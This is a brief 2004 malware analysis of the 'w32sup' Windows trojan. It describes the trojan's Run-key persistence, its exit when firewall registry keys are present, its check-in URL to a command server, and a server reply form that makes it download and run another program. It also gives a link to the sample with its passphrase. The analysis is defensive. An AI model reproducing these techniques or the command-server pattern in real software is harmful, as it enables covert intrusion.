This document describes an initial brief analysis of the "w32sup" trojan for Microsoft Windows as analyzed by Fortego Security during February 2004.
The AntiVirus software (from a major well-known leading provider) in use by the client which had been infected by this trojan did not detect this program. Neither any spyware-detection programs that we use did detect it. An internet search indicated that this might be "just" an adult-site dialer trojan.
The program code was "encrypted", or rather binary compressed, with UPX. Neither the compressed nor the uncompressed version of the program was detected by antivirus nor antispyware.
When the w32sup.exe program is being run, it copies itself to C:\winnt\system32\ and adds itself to the key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ for automatic startup.
Then the program checks for registry keys related to local firewalls. It checks for occurances of Tiny Personal Firewall, Sygate, DeerField, McAfee, Conseal, Signal 9, Black ICE and Zone Labs. If any of these keys are found the program exits. This holds true even if no local firewall is actually installed.
The program then opens a local TCP port with a random port number, e.g. 9149/tcp, and sends the port number to "Live-Vids" by connecting to http://www.live-vids.com/r.php?id=9149. Then the trojan waits for a connection back from the server. In the test environment we set up, we did never receive any connections from neither Live-Vids nor anyone else on the stated port.
If the trojan can't connect to Live-Vids, for some reason, it exits. Some reason may e.g. be that it can't make a DNS lookup.
During all the time that we analyzed the w32sup trojan, the Live-Vids server only replied with a common "200 OK", but there is also another special feature!
The server can instead reply with a command like "update: 2.0 www.other-site.com/other-backdoor.exe"
Then the w32sup trojan will download the specified program from the internet and executed the new program on the infected system.
In our opinion, this quite devious and interesting, since the "real" intentions of the people behind this program is not revealed until the "real" backdoor is downloaded after the update command is sent. And before it can always be argued that this is "only" another porn-dialer etc.
For debugging purposes, a useful breakpoint at the subroutine which takes the decision on wether to "update" or not, can be set at 0x0040A429.
The w32sup.exe can be downloaded here. The file is encrypted with GnuPG and the passphrase "foobar" to prevent it from being detected by antivirus software in the future and also to prevent it from being downloaded and executed by mistake.